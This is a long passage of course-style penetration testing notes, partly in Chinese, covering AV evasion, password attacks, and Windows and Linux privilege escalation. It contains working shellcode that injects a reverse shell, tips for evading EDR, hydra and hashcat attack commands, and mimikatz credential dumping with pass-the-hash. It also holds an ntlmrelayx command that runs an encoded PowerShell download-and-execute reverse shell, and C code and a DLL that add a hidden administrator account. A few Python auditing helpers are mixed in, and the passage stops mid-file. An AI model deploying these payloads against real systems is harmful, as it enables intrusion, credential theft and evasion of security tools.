[Byte[]] $sc = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x0,0x0,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x7,0xff,0xd5,0xb8,0x90,0x1,0x0,0x0,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x0,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x5,0x68,0xc0,0xa8,0x32,0x1,0x68,0x2,0x0,0x1,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xc,0xff,0x4e,0x8,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x68,0x63,0x6d,0x64,0x0,0x89,0xe3,0x57,0x57,0x57,0x31,0xf6,0x6a,0x12,0x59,0x56,0xe2,0xfd,0x66,0xc7,0x44,0x24,0x3c,0x1,0x1,0x8d,0x44,0x24,0x10,0xc6,0x0,0x44,0x54,0x50,0x56,0x56,0x56,0x46,0x56,0x4e,0x56,0x56,0x53,0x56,0x68,0x79,0xcc,0x3f,0x86,0xff,0xd5,0x89,0xe0,0x4e,0x56,0x46,0xff,0x30,0x68,0x8,0x87,0x1d,0x60,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x6,0x7c,0xa,0x80,0xfb,0xe0,0x75,0x5,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x0,0x53,0xff,0xd5;

$size = 0x1000;

if ($sc.Length -gt 0x1000) {$size = $sc.Length};

$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);

for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};

$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };

This evades some detection but not enough; further rename the variables

$winFunc   --   $var2
Win32 -- iWin32
$sc -- $var1

Save as bypass.ps1; this gets past some EDR products

Running it on Windows also requires relaxing the execution policy

Check the execution policy

Get-ExecutionPolicy -Scope CurrentUser

Undefined

Change it

Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser

Choose A (Yes to All)

Check again

Get-ExecutionPolicy -Scope CurrentUser

Unrestricted

Run bypass.ps1 to get a shell

PS C:\Users\offsec\Desktop> .\bypass.ps1

14.3.3 Automated tools

Install

apt-cache search shellter
sudo apt install shellter
sudo apt install wine
dpkg --add-architecture i386 && apt-get update && apt-get install wine32

Run

shellter 
A -- automatic mode
Enter the PE file to inject into
Y -- enter Shellter's stealth mode
L -- choose a payload from the list
1 -- the first reverse shell
Enter lhost and lport
Generate

Start a Metasploit listener locally; running the generated PE file returns a shell

msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 192.168.50.1;set LPORT 443;run;"

This post covers chapter 15 of the textbook, "network service password attacks", "password cracking basics" and "working with password hashes", recording the tools and commands used.

15.1 Network service password attacks

15.1.1 SSH and RDP

SSH password brute force

hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201

RDP password spraying

hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" rdp://192.168.50.202

15.1.2 HTTP POST login form brute force

hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"

15.2 Password cracking basics

15.2.2 Wordlist mutation

Take a small slice of the wordlist for the demonstration

head /usr/share/wordlists/rockyou.txt > demo.txt

Remove the lines starting with 1

sed -i '/^1/d' demo.txt

Create a rule file (append a 1)

echo \$1 > demo.rule

View the mutated wordlist with hashcat

hashcat -r demo.rule --stdout demo.txt

Compare two different rule files

kali@kali:~/passwordattacks$ cat demo1.rule   
$1 c

kali@kali:~/passwordattacks$ hashcat -r demo1.rule --stdout demo.txt
Password1
Iloveyou1
Princess1
Rockyou1
Abc1231

kali@kali:~/passwordattacks$ cat demo2.rule
$1
c

kali@kali:~/passwordattacks$ hashcat -r demo2.rule --stdout demo.txt
password1
Password
iloveyou1
Iloveyou
princess1
Princess
kali@kali:~/passwordattacks$ cat demo1.rule   
$1 c $!

kali@kali:~/passwordattacks$ hashcat -r demo1.rule --stdout demo.txt
Password1!
Iloveyou1!
Princess1!
Rockyou1!
Abc1231!

kali@kali:~/passwordattacks$ cat demo2.rule
$! $1 c

kali@kali:~/passwordattacks$ hashcat -r demo2.rule --stdout demo.txt
Password!1
Iloveyou!1
Princess!1
Rockyou!1
Abc123!1
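As an added example (not code from the course or from hashcat), a small interpreter for the rule functions used in these listings ($X append, ^X prepend, c capitalize, l lowercase, u uppercase, : no-op), run over the demo.txt words from above. It reproduces the outputs shown: functions on one line are applied left to right, so "$1 c $!" and "$! $1 c" give different candidates, while each separate rule line yields its own candidate per word. DEMO_WORDS is the constructed content of demo.txt after the sed step.

```python
from typing import Iterable, List

# demo.txt after `head rockyou.txt` and `sed -i '/^1/d'`: the five words that do not start with 1
DEMO_WORDS = ["password", "iloveyou", "princess", "rockyou", "abc123"]


def apply_rule(word: str, rule: str) -> str:
    """Apply one rule line (whitespace-separated functions) to a word, left to right."""
    for func in rule.split():
        if func == ":":            # no-op: emit the word unchanged
            continue
        if func == "c":            # capitalize: first character upper, rest lower
            word = word[:1].upper() + word[1:].lower()
        elif func == "l":
            word = word.lower()
        elif func == "u":
            word = word.upper()
        elif func.startswith("$") and len(func) == 2:   # $X appends X
            word = word + func[1]
        elif func.startswith("^") and len(func) == 2:   # ^X prepends X
            word = func[1] + word
        else:
            raise ValueError(f"unsupported rule function: {func!r}")
    return word


def mangle(words: Iterable[str], rules: Iterable[str]) -> List[str]:
    """Like `hashcat -r rulefile --stdout wordlist`: for each word, one candidate per rule
    line, in wordlist order. Blank lines and lines starting with # are skipped."""
    active = [r for r in (line.strip() for line in rules) if r and not r.startswith("#")]
    candidates = []
    for word in words:
        for rule in active:
            candidates.append(apply_rule(word, rule))
    return candidates


if __name__ == "__main__":
    # demo1.rule and demo2.rule from the page, constructed inline
    for name, rules in (("demo1.rule", ["$1 c $!"]), ("demo2.rule", ["$! $1 c"]),
                        ("two lines", ["$1", "c"])):
        print(name, "->", mangle(DEMO_WORDS, rules))
```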

Cracking a hash with the rules

kali@kali:~/passwordattacks$ cat crackme.txt   
f621b6c9eab51a3e2f4e167fee4c6860

kali@kali:~/passwordattacks$ cat demo3.rule
$1 c $!
$2 c $!
$1 $2 $3 c $!

Crack

hashcat -m 0 crackme.txt /usr/share/wordlists/rockyou.txt -r demo3.rule --force

View the default rules

ls -la /usr/share/hashcat/rules/

15.2.4 Password managers

KeePass stores its database in a .kdbx file

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

Extract the hash

keepass2john Database.kdbx > keepass.hash

Remove the prefix at the start of the hash

Database:

After removal it looks like this

kali@kali:~/passwordattacks$ cat keepass.hash   
$keepass$*2*60*0*d74e29a727e9338717d27a7d457ba3486d20dec73a9db1a7fbc7a068c9aec6bd*04b0bfd787898d8dcd4d463ee768e...

Find the hashcat mode

hashcat --help | grep -i "KeePass"

Crack

hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force

john can also crack it directly without editing the hash file

15.2.5 SSH key passphrase cracking

ssh2john id_rsa > ssh.hash
cat ssh.hash
$6
hashcat -h | grep -i "ssh"
$6 corresponds to 22921 | RSA/DSA/EC/OpenSSH Private Keys ($6$)

Create the rules

kali@kali:~/passwordattacks$ cat ssh.rule
c $1 $3 $7 $!
c $1 $3 $7 $@
c $1 $3 $7 $#

Create the wordlist

kali@kali:~/passwordattacks$ cat ssh.passwords
Window
rickc137
dave
superdave
megadave
umbrella

Crack

hashcat -m 22921 ssh.hash ssh.passwords -r ssh.rule --force

Alternatively, add the rules to the john configuration and crack with john (for --rules=sshRules to find them, the appended block must begin with a [List.Rules:sshRules] section header)

sudo sh -c 'cat /home/kali/passwordattacks/ssh.rule >> /etc/john/john.conf'
john --wordlist=ssh.passwords --rules=sshRules ssh.hash

With the passphrase, log in over SSH

ssh -i id_rsa -p 2222 dave@192.168.50.201
Enter the passphrase to log in

15.3 Working with password hashes

15.3.1 Cracking NTLM

List local users

PS C:\Users\offsec> Get-LocalUser

Run cmd or PowerShell as administrator (mimikatz needs administrator privileges)

.\mimikatz.exe
privilege::debug
token::elevate
lsadump::sam

Hashes from the SAM

User : nelly
Hash NTLM: 3ae8e5f0ffabb3a627672e1600f1ba10

Crack

hashcat --help | grep -i "ntlm"
hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

15.3.2 Passing NTLM

Obtain hashes with mimikatz

.\mimikatz.exe
privilege::debug
token::elevate
lsadump::sam

With the administrator's hash, pass the hash with smbclient

smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b

This gives access to the SMB share and its files

Or pass the hash with psexec to get a shell

impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212

wmiexec can also pass the hash to get a shell

impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212

15.3.3 Cracking Net-NTLMv2

Capture the hash: start a listener locally (192.168.119.2)

ip a
sudo responder -I tap0

Run a command on the target machine

dir \\\\192.168.119.2\\test

Captured hash

[+] Listening for events... 
[SMB] NTLMv2-SSP Client : ::ffff:192.168.50.211
[SMB] NTLMv2-SSP Username : FILES01\paul
[SMB] NTLMv2-SSP Hash : paul::FILES01:1f9d4c51f6e...

Save the hash and find the hashcat mode

hashcat --help | grep -i "ntlm"

5600 | NetNTLMv2

Crack

hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force

15.3.4 Net-NTLMv2 relay

When the password cannot be cracked, relay the authentication instead

impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIAMwA3AC8AcABvAHcAZQByAGMAYQB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAALQBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMwA3ACAALQBwACAAOQAwADkAMAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwA"

If that errors, run the Python script directly with python3

python3 /usr/local/bin/ntlmrelayx.py --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIAMwA3AC8AcABvAHcAZQByAGMAYQB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAALQBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMwA3ACAALQBwACAAOQAwADkAMAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwA"

The PowerShell command must be base64 encoded

$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

pwsh
$Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.119.3",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText

本篇对应教材第16章,主要内容”Windows提权信息枚举”、”利用Windows服务”、”利用其他Windows组件”,记录使用工具和命令

16.1 Windows提权信息枚举

16.1.2 基本信息枚举

查看当前用户和组

1
2
whoami
whoami /groups
1
2
3
4
5
powershell
Get-LocalUser
Get-LocalGroup
Get-LocalGroupMember adminteam
Get-LocalGroupMember Administrators

查看系统信息

1
systeminfo

查看网络和路由信息

1
2
3
ipconfig /all
route print
netstat -ano

Installed software (32-bit and 64-bit)

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

Running processes

Get-Process

16.1.3 Cleartext password storage

Look for password files, focusing on the usual locations

.kdbx -- KeePass password database
type C:\xampp\passwords.txt
type C:\xampp\mysql\bin\my.ini
cat Desktop\asdf.txt
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Users\dave\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue

Once a password is obtained, a cmd can be started as that user

PS C:\Users\steve> runas /user:backupadmin cmd

16.1.4 PowerShell history

View the history

Get-History

Location of the history file

(Get-PSReadlineOption).HistorySavePath

Read the history file

type C:\Users\dave\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

A sensitive file referenced in the history

type C:\Users\Public\Transcripts\transcript01.txt

The file contains a password and session connection details; use them to open a session

$password = ConvertTo-SecureString "qwertqwertqwert123!!" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("daveadmin", $password)
Enter-PSSession -ComputerName CLIENTWK220 -Credential $cred
whoami

Commands run inside the PSSession may return no output; use WinRM instead. Note that special characters in the password must be escaped.

evil-winrm -i 192.168.50.220 -u daveadmin -p "qwertqwertqwert123\!\!"

16.1.5 Automated enumeration

winPEAS

cp /usr/share/peass/winpeas/winPEASx64.exe .
python3 -m http.server 80

powershell
iwr -uri http://192.168.118.2/winPEASx64.exe -Outfile winPEAS.exe
.\winPEAS.exe

16.2 Abusing Windows services

16.2.1 Service binary hijacking

List services

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

Check the access permissions on the service binaries

icacls "C:\xampp\apache\bin\httpd.exe"
icacls "C:\xampp\mysql\bin\mysqld.exe"
Mask  Permissions
F     Full access
M     Modify access
RX    Read and execute access
R     Read-only access
W     Write-only access

Look for F and W permissions
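
Reading icacls output by eye works for one file, but an audit of every service binary needs the check automated. The following is an added example (not from the notes or the course): it parses icacls output for a given file, separates inheritance flags from rights, and reports any low-privilege principal that can overwrite the binary. The icacls output is constructed for the example and modelled on the mysqld.exe check above; M is treated as write-capable alongside F and W because Modify includes write and delete. The principal list and the specific-rights set are assumptions for this example.

```python
import re

# Constructed icacls output, modelled on the page's check of the XAMPP service binary.
# The ACEs are made up for this example; run icacls yourself for real values.
SAMPLE_ICACLS = r"""C:\xampp\mysql\bin\mysqld.exe BUILTIN\Administrators:(F)
                              NT AUTHORITY\SYSTEM:(F)
                              BUILTIN\Users:(F)
                              NT AUTHORITY\Authenticated Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# One ACE per line: "<principal>:(flag)(flag)...". The first line also carries the file path.
_ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<perms>(?:\([^)]*\))+)\s*$")

INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}      # inheritance markers, not rights
WRITE_SIMPLE = {"F", "M", "W"}                      # simple rights that allow replacing the file
WRITE_SPECIFIC = {"WD", "AD", "D", "DC"}            # specific rights that do the same
# Principals every authenticated user falls under; a service binary writable by these is a finding.
LOW_PRIV_PRINCIPALS = {
    "BUILTIN\\Users",
    "NT AUTHORITY\\Authenticated Users",
    "NT AUTHORITY\\INTERACTIVE",
    "Everyone",
}


def parse_icacls(output, path):
    """Return [(principal, [rights, ...]), ...] for the icacls output of `path`."""
    aces = []
    for line in output.splitlines():
        m = _ACE_RE.match(line.strip())
        if not m:
            continue
        principal = m.group("principal")
        if principal.startswith(path + " "):            # first line: strip the path
            principal = principal[len(path) + 1:]
        tokens = re.findall(r"\(([^)]*)\)", m.group("perms"))
        rights = [t for t in tokens if t not in INHERIT_FLAGS]
        aces.append((principal, rights))
    return aces


def grants_write(rights):
    """True if any listed right lets the principal modify or replace the file."""
    for right in rights:
        if right in WRITE_SIMPLE or set(right.split(",")) & WRITE_SPECIFIC:
            return True
    return False


def writable_by_low_priv(output, path, extra_principals=()):
    """Principals from the low-privilege set (plus any extras) that can overwrite `path`."""
    watch = LOW_PRIV_PRINCIPALS | set(extra_principals)
    return [p for p, rights in parse_icacls(output, path) if p in watch and grants_write(rights)]


if __name__ == "__main__":
    print(writable_by_low_priv(SAMPLE_ICACLS, r"C:\xampp\mysql\bin\mysqld.exe"))
```

Feed it the output of `icacls` for each PathName returned by the Get-CimInstance query above; anything it reports is a service whose binary should be re-owned and have its ACL tightened to Administrators and SYSTEM only.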

Create a program that adds a user

#include <stdlib.h>

int main ()
{
    int i;

    i = system ("net user dave2 password123! /add");
    i = system ("net localgroup administrators dave2 /add");

    return 0;
}

Compile

x86_64-w64-mingw32-gcc adduser.c -o adduser.exe

Download and replace the binary

iwr -uri http://192.168.119.3/adduser.exe -Outfile adduser.exe
move C:\xampp\mysql\bin\mysqld.exe mysqld.exe
move .\adduser.exe C:\xampp\mysql\bin\mysqld.exe

Restart the service

net stop mysql

If you lack permission to restart the service, check whether it starts automatically at boot; if so, check whether the machine can be rebooted

Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}
whoami /priv
With SeShutdownPrivilege the machine can be rebooted

shutdown /r /t 0

After the reboot, check the users
Get-LocalGroupMember administrators

The automated tool PowerUp.ps1 can also be used

cp /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 .
python3 -m http.server 80

iwr -uri http://192.168.119.3/PowerUp.ps1 -Outfile PowerUp.ps1
powershell -ep bypass
. .\PowerUp.ps1
Get-ModifiableServiceFile
Install-ServiceBinary -Name 'mysql'

This errors out; automated tools cannot always be trusted blindly, and manual exploitation is sometimes needed.

16.2.2 Service DLL hijacking

Enumerate services

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

Check the binary's permissions

icacls .\Documents\BetaServ.exe

It is readable and executable but cannot be replaced; use Procmon64.exe to observe which DLLs the process loads

Click Filter and add a filter rule

Process Name is BetaServ.exe 

Then restart the service

Restart-Service BetaService

Several attempts to load myDLL.dll are visible

Check the PATH environment variable

PS C:\Users\steve> $env:path
C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\steve\AppData\Local\Microsoft\WindowsApps;

Place a DLL in the first directory of the search path

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
    HANDLE hModule,             // Handle to DLL module
    DWORD ul_reason_for_call,   // Reason for calling function
    LPVOID lpReserved )         // Reserved
{
    switch ( ul_reason_for_call )
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL.
            int i;
            i = system ("net user dave2 password123! /add");
            i = system ("net localgroup administrators dave2 /add");
            break;
        case DLL_THREAD_ATTACH: // A process is creating a new thread.
            break;
        case DLL_THREAD_DETACH: // A thread exits normally.
            break;
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
            break;
    }
    return TRUE;
}

Compile

x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll

Place it in a directory on the search path that is writable, e.g.:

C:\Users\steve\Documents 
cd Documents
iwr -uri http://192.168.119.3/myDLL.dll -Outfile myDLL.dll
net user

Restart the service; the DLL is loaded and the code runs

Restart-Service BetaService
net user
net localgroup administrators

The administrator account was added successfully

16.2.3 Unquoted service paths

When a path contains spaces and is not wrapped in quotes, the executables are tried in this order:

C:\Program Files\My Program\My Service\service.exe
Order:
C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My Program\My.exe
C:\Program Files\My Program\My service\service.exe

Enumerate services and their paths (PowerShell)

Get-CimInstance -ClassName win32_service | Select Name,State,PathName

Enumerate services with unquoted paths (cmd)

wmic service get name,pathname |  findstr /i /v "C:\Windows\\" | findstr /i /v """

A service is found

Name                                       PathName                                                                   
...
GammaService C:\Program Files\Enterprise Apps\Current Version\GammaServ.exe

Test whether it can be started and stopped

Start-Service GammaService
Stop-Service GammaService

Execution order

C:\Program.exe
C:\Program Files\Enterprise.exe
C:\Program Files\Enterprise Apps\Current.exe
C:\Program Files\Enterprise Apps\Current Version\GammaServ.exe
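
The candidate list above is mechanical, so an auditor can compute it for every service rather than by hand. The following is an added example (not from the notes or the course): it derives the search order for an unquoted PathName, walks `wmic service get name,pathname` output to report every affected service, and produces the quoted form that the service's binPath should hold. The wmic output is constructed for the example; the GammaService row mirrors the one shown above, the other rows are made up for contrast.

```python
import re

# Constructed `wmic service get name,pathname` output; the GammaService line mirrors the
# one shown on the page, the other two rows are made up for contrast.
SAMPLE_WMIC = r"""Name                PathName
ApacheService       "C:\xampp\apache\bin\httpd.exe" -k runservice
GammaService        C:\Program Files\Enterprise Apps\Current Version\GammaServ.exe
mysql               C:\xampp\mysql\bin\mysqld.exe --defaults-file=C:\xampp\mysql\bin\my.ini MySQL
"""

_EXE_RE = re.compile(r"(.+?\.exe)(\s.*)?$", re.IGNORECASE)


def split_executable(pathname):
    """Split a service PathName into (executable, arguments); arguments may be ''."""
    m = _EXE_RE.match(pathname.strip())
    if not m:
        return pathname.strip(), ""
    return m.group(1), m.group(2) or ""


def unquoted_candidates(pathname):
    """Executables Windows tries, in order, for an unquoted path containing spaces.
    Returns [] for a quoted path or one without spaces (nothing to hijack)."""
    pathname = pathname.strip()
    if pathname.startswith('"'):
        return []
    exe, _ = split_executable(pathname)
    if " " not in exe:
        return []
    parts = exe.split(" ")
    # each prefix ending at a space becomes "<prefix>.exe", then the real binary last
    candidates = [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]
    candidates.append(exe)
    return candidates


def quoted_pathname(pathname):
    """The hardened form: executable wrapped in quotes (what sc config binPath= should hold)."""
    pathname = pathname.strip()
    if pathname.startswith('"'):
        return pathname
    exe, args = split_executable(pathname)
    return '"%s"%s' % (exe, args)


def find_unquoted_services(wmic_output):
    """Return [(service name, [candidate paths]), ...] for services with unquoted spaced paths."""
    findings = []
    for line in wmic_output.splitlines()[1:]:          # skip the header row
        fields = re.split(r"\s{2,}", line.strip(), maxsplit=1)
        if len(fields) != 2:
            continue
        name, pathname = fields
        candidates = unquoted_candidates(pathname)
        if candidates:
            findings.append((name, candidates))
    return findings


if __name__ == "__main__":
    for name, candidates in find_unquoted_services(SAMPLE_WMIC):
        print(name, candidates, quoted_pathname(candidates[-1]))
```

Each candidate directory (C:\, C:\Program Files, and so on) is then checked with icacls as the notes do; the finding is only exploitable where one of those directories is writable by a low-privilege user, and the fix is the quoted binPath regardless.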

Check whether the directories are writable

icacls "C:\"
icacls "C:\Program Files"
icacls "C:\Program Files\Enterprise Apps"

F or W permission is required, e.g.

C:\Program Files\Enterprise Apps
iwr -uri http://192.168.119.3/adduser.exe -Outfile Current.exe
copy .\Current.exe 'C:\Program Files\Enterprise Apps\Current.exe'
Start-Service GammaService

net user
net localgroup administrators

Automated tool: PowerUp

iwr http://192.168.119.3/PowerUp.ps1 -Outfile PowerUp.ps1
powershell -ep bypass
. .\PowerUp.ps1
Get-UnquotedService

Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe"
Restart-Service GammaService
net user
net localgroup administrators

16.3 Abusing other Windows components

16.3.1 Scheduled tasks

List them

schtasks /query /fo LIST /v

Note the task name, next run time, author, and file path

Check whether the binary can be replaced

icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe

Replace it

iwr -Uri http://192.168.119.3/adduser.exe -Outfile BackendCacheCleanup.exe
move .\Pictures\BackendCacheCleanup.exe BackendCacheCleanup.exe.bak
move .\BackendCacheCleanup.exe .\Pictures\

After the scheduled time has passed, check

net user
net localgroup administrators

16.3.2 Using exploits

Check privileges

whoami /priv

有SeImpersonatePrivilege可以用PrintSpoofer或者土豆系列

1
2
3
4
5
6
7
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
python3 -m http.server 80

powershell
iwr -uri http://192.168.119.2/PrintSpoofer64.exe -Outfile PrintSpoofer64.exe
.\PrintSpoofer64.exe -i -c powershell.exe
whoami

This part covers chapter 17: "Linux privilege escalation enumeration", "Sensitive information", "Insecure file permissions" and "Insecure system components"; it records the tools and commands used.

17.1 Linux privilege escalation enumeration

17.1.2 Manual enumeration

File permissions

ls -l /etc/shadow

Current user id

id

All users

cat /etc/passwd

Hostname

hostname

Operating system information

cat /etc/issue
cat /etc/os-release
uname -a

Process information

ps aux

Focus on processes running as root

Network information

ip a
routel
ss -anp

Firewall rules

cat /etc/iptables/rules.v4

Scheduled tasks

ls -lah /etc/cron*

Check whether any file run as root can be replaced

Current user's cron jobs

crontab -l
sudo crontab -l

Installed packages

dpkg -l

Search for writable directories

find / -writable -type d 2>/dev/null

Mounted filesystems and drives

cat /etc/fstab
mount

Available disks

lsblk

Unmounted disks may contain sensitive information

Kernel modules

lsmod

Module information

/sbin/modinfo libata

Find SUID binaries

find / -perm -u=s -type f 2>/dev/null

17.1.3 Automated enumeration

unix-privesc-check
./unix-privesc-check standard > output.txt

For example, privilege escalation via a writable /etc/passwd

https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation

Other helper scripts

https://github.com/rebootuser/LinEnum
https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS

17.2 Sensitive information

17.2.1 Sensitive information in user configuration

Environment variables (may contain passwords etc.)

env

Bash configuration files (may contain passwords etc.)

cat .bashrc

Switch user once a password is found

su - root
whoami

Build a wordlist based on the password pattern

crunch 6 6 -t Lab%%% > wordlist

Brute-force a specific user's password

hydra -l eve -P wordlist  192.168.50.214 -t 4 ssh -V

After logging in, check sudo

ssh eve@192.168.50.214
sudo -l

User eve may run the following commands on debian-privesc:
(ALL : ALL) ALL

Escalate directly with sudo

sudo -i
Enter eve's password to get root
whoami

17.2.2 Traces of running services

Watch processes for sensitive information

watch -n 1 "ps -aux | grep pass"

Watch network traffic for sensitive information

sudo tcpdump -i lo -A | grep "pass"

17.3 Insecure file permissions

17.3.1 Abusing cron

Check the cron log

grep "CRON" /var/log/syslog

Look for files run by root on a schedule; once found, check their contents and permissions

cat /home/joe/.scripts/user_backups.sh
ls -lah /home/joe/.scripts/user_backups.sh
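
The two checks just described (which commands root runs from cron, and whether those files are writable) are what a host audit should run on every machine, not only one. The following is an added example (not from the notes or the course): it parses CRON entries in syslog format, reports root jobs that execute anything under a user-controlled location, and evaluates the mode bits that the `ls -lah` step above is looking for. The syslog lines are constructed for the example and modelled on the user_backups.sh job; the list of risky prefixes is an assumption.

```python
import re
import stat

# Constructed syslog excerpt (not captured from a real host), modelled on the
# root cron job in the notes. Only the CRON lines matter to the parser.
SAMPLE_SYSLOG = """\
Aug 25 04:56:01 debian-privesc CRON[918]: (root) CMD (/bin/bash /home/joe/.scripts/user_backups.sh)
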